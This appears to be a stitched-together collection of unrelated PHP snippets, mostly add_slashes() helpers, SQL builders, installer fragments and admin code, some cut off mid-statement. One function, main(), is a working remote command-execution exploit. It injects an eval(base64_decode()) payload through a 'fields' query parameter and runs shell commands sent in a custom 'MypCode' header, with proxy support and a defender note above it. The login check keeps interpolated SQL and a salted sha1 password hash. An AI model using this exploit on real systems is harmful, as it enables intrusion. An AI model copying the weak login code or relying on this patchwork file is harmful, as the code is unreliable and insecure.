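/**
 * Displays the additional-settings page and, when the form was submitted
 * (`$_REQUEST['dop']`), regenerates inc/config.inc.php from the posted values.
 *
 * The posted key and the setting's description are written into PHP source, so only
 * keys that already exist in $GLOBALS['CMS_CONFIG'] and look like plain constant
 * names are accepted; everything else is skipped. Values are emitted with
 * var_export(), which yields a correctly escaped PHP literal.
 *
 * @return void
 */
function settingsCase()
{
    global $AVE_Template;

    $cmsConfig = $GLOBALS['CMS_CONFIG'];

    if (!empty($_REQUEST['dop'])) {
        $posted = (isset($_REQUEST['GLOB']) && is_array($_REQUEST['GLOB'])) ? $_REQUEST['GLOB'] : [];

        // Full open tag: a bare '<?' depends on short_open_tag and silently breaks when it is off.
        $set = '<?php';

        foreach ($posted as $k => $v) {
            // The key becomes the constant name inside define(): accept only keys the
            // system already knows and that are syntactically valid identifiers.
            if (!isset($cmsConfig[$k]) || !preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', (string) $k)) {
                continue;
            }
            // Settings are scalar; an array here is malformed input.
            if (is_array($v)) {
                continue;
            }

            $type = isset($cmsConfig[$k]['TYPE']) ? $cmsConfig[$k]['TYPE'] : '';
            switch ($type) {
                case 'bool':
                    $literal = $v ? 'true' : 'false';
                    break;
                case 'integer':
                    $literal = (string) intval($v);
                    break;
                case 'string':
                case 'dropdown':
                default:
                    // var_export() escapes ' and \ for a single-quoted literal; addslashes()
                    // would also leave \" sequences, which PHP keeps verbatim in single quotes.
                    $literal = var_export((string) $v, true);
                    break;
            }

            // DESCR ends up in a line comment; strip line breaks so it cannot end the comment early.
            $descr = isset($cmsConfig[$k]['DESCR'])
                ? str_replace(["\r", "\n"], ' ', (string) $cmsConfig[$k]['DESCR'])
                : '';

            $set .= "\t//" . $descr . "\r\n";
            $set .= "\tdefine('" . $k . "'," . $literal . ");\r\n\r\n";
        }
        $set .= '?>';

        file_put_contents(BASE_DIR . '/inc/config.inc.php', $set);
        reportLog($_SESSION['user_name'] . " - изменил дополнительные настройки системы", 2, 2);
    }

    $AVE_Template->assign('CMS_CONFIG', $GLOBALS['CMS_CONFIG']);
    $AVE_Template->assign('content', $AVE_Template->fetch('settings/settings_case.tpl'));
}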
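/**
 * Checks an administrator login against the ADMIN table and, when a row matches,
 * copies its identity fields into the session.
 *
 * The password is hashed after add_slashes() has run on the form array, exactly as
 * before: changing that order would invalidate stored hashes for passwords that
 * contain quote characters. NOTE(review): sha1(SALT_VAR . password) with one global
 * salt is not a password hash; moving to password_hash()/password_verify() needs a
 * column migration.
 *
 * @param array $login_arr form fields 'username', 'password', 'roleid'
 * @return bool true when a matching admin row was found
 */
function check_admin_login($login_arr)
{
    $login_arr = add_slashes($login_arr);

    // Quoted keys: bare $arr[username] relies on undefined constants, which is a fatal
    // Error on PHP 8. Absent fields become '' instead of a notice.
    $username = isset($login_arr['username']) ? $login_arr['username'] : '';
    $rawPassword = isset($login_arr['password']) ? $login_arr['password'] : '';
    $roleid = isset($login_arr['roleid']) ? $login_arr['roleid'] : '';
    $password = sha1(SALT_VAR . $rawPassword);

    // single_row() takes the WHERE clause as a string, so the slash-escaped values are
    // still interpolated; the hash is hex and needs no escaping.
    $where = "roleid='" . $roleid . "' and `username`='" . $username . "' and `password`='" . $password . "'";
    $row = single_row(ADMIN, "*", $where, "id", "desc", "", false);

    if (!$row) {
        return false;
    }

    // A fresh session id on privilege change stops a pre-login id from being reused.
    if (function_exists('session_status') && session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true);
    }

    // session_register() was removed in PHP 5.4 (and was being given values, not variable
    // names); writing to $_SESSION is all that is needed. NOTE(review): the keys were bare
    // identifiers; if Adm_* are real constants elsewhere, substitute them here.
    $_SESSION['Adm_UserId'] = $row['id'];
    $_SESSION['Adm_RoleId'] = $row['roleid'];
    $_SESSION['Adm_Email'] = $row['email'];
    $_SESSION['Adm_UserNm'] = $row['username'];
    $_SESSION['Adm_Fname'] = $row['fname'];
    $_SESSION['Adm_Lname'] = $row['lname'];

    return true;
}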
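/**
 * Reverts the migration: drops every table registered in `fleximport_tables`,
 * then the registry table itself.
 *
 * @return void
 */
public function down()
{
    $statement = DBManager::get()->prepare("\n SELECT name FROM `fleximport_tables`\n ");
    $statement->execute();

    // fetch(FETCH_COLUMN, 0) returns one scalar (the second argument is a cursor
    // orientation, not a column index), so the original loop never iterated;
    // fetchAll(FETCH_COLUMN, 0) returns the whole column as a list.
    foreach ($statement->fetchAll(PDO::FETCH_COLUMN, 0) as $table_name) {
        // A table name is an identifier, not a string literal: escape by doubling the
        // backtick; addslashes() does nothing for backticks.
        $quoted = str_replace('`', '``', (string) $table_name);
        DBManager::get()->exec("\n DROP TABLE IF EXISTS `" . $quoted . "`;\n ");
    }

    DBManager::get()->exec("\n\t DROP TABLE IF EXISTS `fleximport_tables`;\n\t ");
}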
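/**
 * Adds slashes (for the global request arrays); nested arrays are processed recursively.
 *
 * each() was removed in PHP 8; foreach over a copy visits the same keys in the same
 * order and assigns back into the returned array. Non-string, non-array values are
 * left untouched.
 *
 * @param array $array the array to process
 * @return array the processed array
 */
function add_slashes($array)
{
    foreach ($array as $key => $val) {
        if (is_string($val)) {
            $array[$key] = addslashes($val);
        } elseif (is_array($val)) {
            $array[$key] = add_slashes($val);
        }
    }

    return $array;
}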
/**
 * Entry point of the interactive command loop.
 *
 * Defender note: every request this emits carries a custom `MypCode` header holding
 * base64 and a `fields` query parameter built by to_char(); both are distinctive
 * enough to match in request logs, and a parameterised query on the receiving side
 * removes the injection the loop depends on.
 */
function main()
{
    // :)
    $web = new phpsploit();
    $web->agent('Mozilla Firefox');
    // Hey ya :)
    head();
    // Target
    $url = get_p('url', true);
    // Proxy options
    $prh = get_p('proxhost');
    $pra = get_p('proxauth');
    // Use a proxy ?
    if ($prh) {
        // host:ip
        $web->proxy($prh);
        // Authentication
        if ($pra) {
            $web->proxyauth($pra);
        }
    }
    // Single quote bypass
    $byp = "1');";
    // PHP code
    $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
    // Separator
    $s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
    $c_sep = "print('{$s_sep}');";
    // Final PHP code
    $final = $byp . $c_sep . $php . $c_sep . 'exit();//';
    // Welcome guess !
    while (($cmd = cmd_prompt()) !== false) {
        // magic_quotes_gpc bypass
        $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
        // Go =]
        $web->get($url . 'index.php?fields=' . to_char($final) . ',1');
        // Result
        $res = explode($s_sep, $web->getcontent());
        // Erf
        if (!isset($res[1])) {
            print "\nFailed";
            exit(1);
        } else {
            if (empty($res[1])) {
                print "\nNo output: system() disabled OR cmd failed OR cmd without output";
            } else {
                print "\n" . $res[1];
            }
        }
    }
    return;
}
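/**
 * Runs an UPDATE on $tab, setting every key of $array to its slash-escaped value.
 *
 * $tab and $where are trusted SQL fragments supplied by the caller; values go through
 * add_slashes() as before. Keys are interpolated raw, so only identifier-shaped keys
 * (optionally table-qualified) are accepted. An empty SET list is reported as failure
 * without a round trip instead of sending invalid SQL. The mysql_* extension this
 * relies on was removed in PHP 7; a switch to mysqli/PDO needs the connection handle.
 *
 * @param string $tab   table name
 * @param array  $array column => value map
 * @param string $where WHERE clause without the keyword (default: all rows)
 * @param bool   $disp  echo the query before running it
 * @return bool true on success; false on failure (after echoing mysql_error()) or when nothing is to be set
 */
function upd_rec($tab, $array, $where = "1=1", $disp = false)
{
    $array = add_slashes($array);

    $assignments = [];
    if (is_array($array)) {
        foreach ($array as $k => $v) {
            // A key that is not a plain column name cannot alter the statement.
            if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)?$/', (string) $k)) {
                continue;
            }
            $assignments[] = "{$k}='" . $v . "'";
        }
    }

    // "update t set  where ..." is not valid SQL; the original sent it and failed at the server.
    if ($assignments === []) {
        return false;
    }

    $qry = "update {$tab} set " . implode(",", $assignments) . " where " . $where;

    if ($disp) {
        echo $qry;
    }

    if (!mysql_query($qry)) {
        echo mysql_error() . " - <b>" . $qry . "</b>";
        return false;
    }

    return true;
}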
/**
 * Escapes a string with addslashes(), or every string inside a (nested) array,
 * unless the application flag $GLOBALS['magic_quotes_gpc'] says the request was
 * already escaped.
 *
 * @param mixed $string string, or an array of strings/arrays
 * @return mixed the input with slashes added where applicable
 */
function add_slashes($string)
{
    if ($GLOBALS['magic_quotes_gpc']) {
        return $string;
    }

    if (!is_array($string)) {
        return addslashes($string);
    }

    $escaped = $string;
    foreach ($string as $key => $val) {
        $escaped[$key] = add_slashes($val);
    }

    return $escaped;
}
<?php session_start(); require "base.inc.php"; $data = $_POST; $data = guolv(add_slashes($data)); switch ($data['action']) { case 'user_up': unset($data['action']); if ($conn->post_update("" . DB_EXT . "user", $data, "kq_uniqueid='" . $_COOKIE['uid'] . "'")) { echo 'ok'; } else { echo ''; } break; case 'ly_add': is_login(@$_COOKIE['uid'], 0); $data['kq_uuid'] = uuid(); $data['kq_ctime'] = time(); $data['kq_ip'] = $_SERVER["REMOTE_ADDR"]; unset($data['action']); if ($conn->post_insert("" . DB_EXT . "fankui", $data)) { echo 'ok'; } else { echo ''; } break; case md5('user_add'): if ($data['chkfrom'] == @$_SESSION['add_input']) { $user = is_login(@$_COOKIE['uid']); unset($data['submit']);
$edit_value = $last_name; break; case "email": $value = $email; $edit_value = $email; break; case "alternate email": $value = $alt_email; $edit_value = $alt_email; break; case "phone": $value = add_slashes($phone); $edit_value = $phone; break; case "mobile": $value = add_slashes($mobile); $edit_value = $mobile; break; case "message": $value = nl2br(ucfirst($message)); $edit_value = $message; break; } echo display_contact($each_set->attribute, $value); echo generate_input($each_set->form_element, $each_set->options, $each_set->attribute, $each_set->searchable, $each_set->placeholder, $each_set->class_name, $each_set->style_name, $i, $each_set->is_required, $each->title_placeholder, $edit_value, "edit", $salutation); if ($i == 1) { ?> <div class="row dispRow"> <div class="column small-2"> <strong class="radius" > E-mail</strong> </div>
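/**
 * Lists admin users (i_user_type > 2, excluding id 1) with an optional name search,
 * paginated from the URI segment, and renders the result table.
 *
 * Search state lives in the session under 'arr_session'/'h_search' and is dropped when
 * the stored heading differs from this page's. The offset comes from the URI (0 after
 * a fresh search) and the page size from $this->i_admin_page_limit; $start and $limit
 * are kept for signature compatibility but overridden, as before.
 *
 * Table cells are emitted as raw HTML (the status and action cells carry markup), so
 * name and e-mail values from the database are passed through htmlspecialchars() here;
 * the search term has its LIKE wildcards escaped before add_slashes().
 *
 * @param int|null $start ignored; see above
 * @param int|null $limit ignored; see above
 * @return void
 */
public function show_list($start = NULL, $limit = NULL)
{
    try {
        $this->data['heading'] = addslashes(t("Manage Admin User")); //Package Name[@package] Panel Heading
        $this->session->unset_userdata('last_uri');

        // Session-stored search values are only reused for this same listing.
        $arr_session_data = $this->session->userdata("arr_session");
        if (!is_array($arr_session_data)
            || !isset($arr_session_data['searching_name'])
            || $arr_session_data['searching_name'] != $this->data['heading']) {
            $this->session->unset_userdata("arr_session");
            $arr_session_data = array();
        }

        // Posted values win over the session on a fresh search.
        $is_new_search = (bool) $this->input->post("h_search");
        $s_search = isset($_POST["h_search"]) ? $this->input->post("h_search") : $this->session->userdata("h_search");

        $search_variable = array();
        if ($is_new_search) {
            $search_variable["s_customer_name"] = $this->input->post("s_customer_name");
        } else {
            $search_variable["s_customer_name"] = isset($arr_session_data["s_customer_name"])
                ? $arr_session_data["s_customer_name"]
                : "";
        }

        $s_where = " WHERE n.i_user_type > 2 AND n.i_id != 1 ";
        if ($s_search == "advanced") {
            $term = is_scalar($search_variable["s_customer_name"]) ? (string) $search_variable["s_customer_name"] : "";
            if ($term != "") {
                // '%' and '_' are LIKE wildcards: escape them so the user searches for the
                // literal characters, then escape for the string literal as before.
                $like = add_slashes(addcslashes($term, '%_'));
                $s_where .= " AND CONCAT(n.s_first_name,' ',n.s_last_name) LIKE '%" . $like . "%' ";
            }
            $arr_session = array(
                "searching_name" => $this->data['heading'],
                "s_customer_name" => $search_variable["s_customer_name"],
            );
            $this->session->set_userdata("arr_session", $arr_session);
            $this->session->set_userdata("h_search", $s_search);
            $this->data["h_search"] = $s_search;
            $this->data["s_customer_name"] = $search_variable["s_customer_name"];
        } else {
            $s_where = " WHERE n.i_user_type > 2 AND n.i_id != 1";
            // Release search values from the session.
            $this->session->unset_userdata("arr_session");
            $this->session->unset_userdata("h_search");
            $this->data["h_search"] = $s_search;
            $this->data["s_customer_name"] = "";
        }
        unset($s_search, $arr_session, $search_variable);

        // A new search starts at offset 0; otherwise the offset comes from the URI.
        if ($is_new_search) {
            $start = 0;
        } else {
            $start = $this->uri->segment($this->i_uri_seg);
        }
        $limit = $this->i_admin_page_limit;
        $info = $this->mod_rect->fetch_multi($s_where, intval($start), $limit);
        $this->session->set_userdata('last_uri', $start);

        $table_view = array();
        $table_view["caption"] = addslashes(t("Manage Admin User"));
        // count() on a non-array is a TypeError on PHP 8; treat "no result" as zero rows.
        $table_view["total_rows"] = is_array($info) ? count($info) : 0;
        $table_view["total_db_records"] = $this->mod_rect->gettotal_info($s_where);
        $table_view["detail_view"] = false; // to disable show details.

        // Column headers with width and alignment, in display order.
        $table_view["headers"] = array(
            array("width" => "30%", "align" => "left", "val" => addslashes(t("Name"))),
            array("val" => addslashes(t("Email")), "width" => "25%", "align" => "left"),
            array("val" => addslashes(t("Status")), "width" => "10%", "align" => "left"),
        );

        for ($i = 0; $i < $table_view["total_rows"]; $i++) {
            $row = $info[$i];
            // Used inside HTML id attributes below.
            $row_id = htmlspecialchars((string) $row["i_id"], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            $i_col = 0;
            $table_view["tablerows"][$i][$i_col++] = encrypt($row["i_id"]);
            // Database text must be escaped here because cells are rendered as raw HTML.
            $table_view["tablerows"][$i][$i_col++] = htmlspecialchars($row["s_first_name"] . ' ' . $row["s_last_name"], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '<br>(Username: '******')'; // username expression is redacted in this listing
            $table_view["tablerows"][$i][$i_col++] = htmlspecialchars((string) $row["s_email"], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

            if ($row["i_status"] == 1) {
                $table_view["tablerows"][$i][$i_col++] = '<span class="label label-success" id="status_row_id_' . $row_id . '">Active</span>';
                $action = '<a data-toggle="tooltip" data-placement="bottom" title="Make Inactive" class="glyphicon glyphicon-ok" id="approve_img_id_' . $row_id . '_inactive" href="javascript:void(0);" rel="make_inactive"></a>';
            } else {
                $table_view["tablerows"][$i][$i_col++] = '<span class="label label-default" id="status_row_id_' . $row_id . '">Inactive</span>';
                $action = '<a data-toggle="tooltip" data-placement="bottom" title="Make Active" class="glyphicon glyphicon-ban-circle" id="approve_img_id_' . $row_id . '_active" href="javascript:void(0);" rel="make_active"></a>';
            }
            // Both branches produce a non-empty action, so it is always attached.
            $table_view["rows_action"][$i] = $action;
        }

        unset($i, $i_col, $start, $limit);
        $this->data["table_view"] = $this->admin_showin_table($table_view, TRUE);
        $this->data["search_action"] = $this->pathtoclass . $this->router->fetch_method(); //used for search form action
        $this->render();
        unset($table_view, $info);
    } catch (Exception $err_obj) {
        show_error($err_obj->getMessage());
    }
}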
$database_name = $_POST['database_name']; } // Get table prefix // Find out if the user wants to install tables and data if (isset($_POST['install_tables']) && $_POST['install_tables'] == 'true') { $install_tables = true; } else { $install_tables = false; } // End database details code // Begin company name code // Get company name if (!isset($_POST['company_name']) || $_POST['company_name'] == '') { set_error('Please enter a company name'); } else { $company_name = add_slashes($_POST['company_name']); } // End website company name // Check if the user has entered a correct path if (!file_exists(accounting_scheme())) { set_error('It appears the accounting scheme does not exist'); } // Get admin email and validate it if (!isset($_POST['admin_email']) || $_POST['admin_email'] == '') { set_error('Please enter an email for the Administrator account'); } else { if (eregi("^([0-9a-zA-Z]+[-._+&])*[0-9a-zA-Z]+@([-0-9a-zA-Z]+[.])+[a-zA-Z]{2,6}\$", $_POST['admin_email'])) { $admin_email = $_POST['admin_email']; } else { set_error('Please enter a valid email address for the Administrator account'); }
require_once FUN_PATH . "global.func.inc.php"; require_once CLASS_PATH . "class_alert.inc.php"; /* 传入类型 */ if (isset($_POST['type'])) { $type = $_POST['type']; } else { exit("非法操作"); } $passarray = array(md5("weijintai"), md5("index_add")); //是否追加"//" if (in_array($type, $passarray)) { $data = $_POST; } else { $data = add_slashes($_POST); } //为空的取消 foreach ($data as $key => $value) { if (is_array($value)) { $data[$key] = $value; } else { if ($value) { $data[$key] = trim($value); } elseif ($value == '') { unset($data[$key]); } } } switch ($type) { /*管理员权限添加*/
/**
 * Serializes $data after stripping slashes from it, then adds slashes to the
 * serialized string so it can be stored through the slash-escaping layer.
 *
 * @param mixed $data value to serialize
 * @return string slash-escaped serialized representation
 */
function my_serialize($data)
{
    $plain = del_slashes($data);
    $packed = serialize($plain);

    return add_slashes($packed);
}
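// Bootstrap: path constants, request timestamp, output charset, slash-escaping of the
// request superglobals, core includes, and the database connection.
define('TOA_ROOT', str_replace('\\', '/', substr(dirname(__FILE__), 0, -7)));
define('CACHE_ROOT', TOA_ROOT . 'cache/');
define('PHP_TIME', time());

// Send the charset header only while headers can still be sent; the former '@'
// silently dropped the failure and let the page go out with the wrong charset.
if (!headers_sent()) {
    header("content-Type: text/html; charset=utf-8");
}

$mtime = explode(' ', microtime());
$starttime = $mtime[0] + $mtime[1];

require TOA_ROOT . 'include/function_cache.php';
require TOA_ROOT . 'include/function_version.php';
require TOA_ROOT . 'include/function_global.php';

define('template', TOA_ROOT . 'template/default/');

// get_magic_quotes_gpc() has returned false since PHP 5.4 and was removed in 8.0; the
// function_exists() guard keeps the original outcome (escape unless magic quotes did)
// on every version instead of a fatal error.
if (!(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc())) {
    $_GET = add_slashes($_GET);
    $_POST = add_slashes($_POST);
    $_COOKIE = add_slashes($_COOKIE);
}
$_FILES = add_slashes($_FILES);

if (empty($_SERVER['PHP_SELF'])) {
    $_SERVER['PHP_SELF'] = $_SERVER['SCRIPT_NAME'];
}

$superadmin = '';

require TOA_ROOT . 'config.php';
require TOA_ROOT . 'include/class_mysql.php';
require TOA_ROOT . 'include/class_user.php';
require TOA_ROOT . 'include/class_config.php';
require TOA_ROOT . 'include/function_common.php';
require TOA_ROOT . 'include/excel_writer.class.php';
require TOA_ROOT . 'include/class_Utility.php';
require TOA_ROOT . 'include/class_ugcode.php';
require TOA_ROOT . 'include/sms.class.php';
require TOA_ROOT . 'include/class_ads.php';
require TOA_ROOT . 'include/word.class.php';

$db = new Mysql();
$db->connect(DB_HOST, DB_USER, DB_PWD, DB_NAME, DB_PCONNECT);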
$database_name = $_POST['database_name']; } // Get table prefix if (preg_match('/[^a-z0-9_]+/i', $_POST['table_prefix'])) { // contains invalid characters (only a-z, A-Z, 0-9 and _ allowed to avoid problems with table/field names) set_error('Only characters a-z, A-Z, 0-9 and _ allowed in table_prefix.', 'table_prefix'); } else { $table_prefix = $_POST['table_prefix']; } $install_tables = true; // Begin website title code // Get website title if (!isset($_POST['website_title']) or $_POST['website_title'] == '') { set_error('Please enter a website title', 'website_title'); } else { $website_title = add_slashes($_POST['website_title']); } // End website title code // Begin admin user details code // Get admin username if (!isset($_POST['admin_username']) or $_POST['admin_username'] == '') { set_error('Please enter a username for the Administrator account', 'admin_username'); } else { $admin_username = $_POST['admin_username']; } // Get admin email and validate it if (!isset($_POST['admin_email']) or $_POST['admin_email'] == '') { set_error('Please enter an email for the Administrator account', 'admin_email'); } else { if (preg_match('/^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$/i', $_POST['admin_email'])) { $admin_email = $_POST['admin_email'];
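/**
 * Recursively applies addslashes() to every scalar in $data, unless magic quotes
 * already escaped the request (never the case since PHP 5.4).
 *
 * The original discarded the result of the recursive call, so nested arrays came
 * back unescaped; the result is now written back into the returned array.
 *
 * @param mixed $data array (possibly nested) or scalar
 * @return mixed the escaped copy; non-array input is returned unchanged
 */
function add_slashes($data)
{
    if (!is_array($data)) {
        return $data;
    }

    // get_magic_quotes_gpc() no longer exists on PHP 8; treat "unavailable" as "off".
    $magic = function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc();

    foreach ($data as $key => $value) {
        if (is_array($value)) {
            $data[$key] = add_slashes($value);
        } elseif (!$magic) {
            $data[$key] = addslashes($value);
        }
    }

    return $data;
}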
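/**
 * Builds "SELECT $select_fields FROM $table WHERE … $more_sql" and returns every row.
 *
 * $conditions is either a string in "id=15&some_field='value'" form (split on '&',
 * each part used verbatim, empty parts dropped) or array('field' => value). Array
 * values that are strings are quoted (and escaped with add_slashes() when
 * $_auto_add_slashes is on); null becomes "IS NULL" and booleans 0/1, where the
 * original produced an empty or invalid right-hand side. Field names are backtick
 * quoted with embedded backticks doubled. $table, $select_fields, $more_sql and
 * string conditions are trusted SQL fragments supplied by the caller.
 *
 * @param string $table
 * @param mixed $conditions
 * @param string $select_fields
 * @param string $more_sql
 * @return array
 */
function sqlSelectAll($table, $conditions = 1, $select_fields = '*', $more_sql = '')
{
    $where = [];

    if (is_array($conditions)) {
        foreach ($conditions as $field => $value) {
            // Doubling the backtick keeps a field name from closing the identifier quote.
            $column = "`" . str_replace('`', '``', $field) . "`";

            if (is_string($value)) {
                if ($this->_auto_add_slashes) {
                    $value = add_slashes($value);
                }
                $where[] = "{$column}='" . $value . "'";
            } elseif ($value === null) {
                // "= NULL" never matches in SQL and the original emitted "`f`=" with nothing after it.
                $where[] = "{$column} IS NULL";
            } elseif (is_bool($value)) {
                $where[] = "{$column}=" . ($value ? '1' : '0');
            } else {
                $where[] = "{$column}={$value}";
            }
        }
    } else {
        // Drop empty segments ("a=1&&b=2", or an empty string) that would yield "AND  AND".
        $where = array_values(array_filter(
            explode('&', (string) $conditions),
            static function ($part) {
                return $part !== '';
            }
        ));
    }

    // No usable condition: match every row instead of emitting "WHERE " with nothing after it.
    if ($where === []) {
        $where[] = '1';
    }

    // build the query
    $query = "SELECT {$select_fields} FROM {$table} WHERE " . implode(" AND ", $where) . " " . $more_sql;

    return $this->sqlFetchAll($query);
}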